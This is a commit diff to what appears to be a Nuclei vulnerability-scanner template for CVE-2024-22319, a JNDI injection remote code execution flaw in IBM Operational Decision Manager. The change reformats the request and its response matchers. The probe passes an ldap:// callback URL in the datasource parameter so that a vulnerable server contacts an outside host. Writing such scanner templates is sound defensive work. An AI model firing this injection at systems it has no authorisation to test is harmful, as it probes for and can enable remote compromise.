req type and matcher update

2024-02-22 17:12:17 +05:30 · 2024-02-22 17:12:17 +05:30 · 3c9e393d50
parent f6e683d7e5
commit 3c9e393d50
1 changed files with 11 additions and 20 deletions
--- a/http/cves/2024/CVE-2024-22319.yaml
+++ b/http/cves/2024/CVE-2024-22319.yaml
@ -5,7 +5,7 @@ info:
  author: DhiyaneshDK
  severity: critical
  description: |
-    "IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API.  IBM X-Force ID:  279145."
+    IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API.  IBM X-Force ID:  279145.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
@ -24,24 +24,15 @@ info:
  tags: cve,cve2024,ibm,odm,decision-manager,jndi,jsf,rce

 http:
-  - raw:
-      - |
-        GET /decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}} HTTP/1.1
-        Host: {{Hostname}}
+  - method: GET
+    path:
+      - "{{BaseURL}}/decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}}"

-    matchers-condition: and
    matchers:
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "dns"
-
-      - type: word
-        part: body
-        words:
-          - '"patchLevel":'
-
-      - type: word
-        part: header
-        words:
-          - 'application/json'
+      - type: dsl
+        dsl:
+          - contains(interactsh_protocol, "dns")
+          - 'contains(header, "application/json")'
+          - 'contains(body, "patchLevel\":")'
+          - 'status_code == 200'
+        condition: and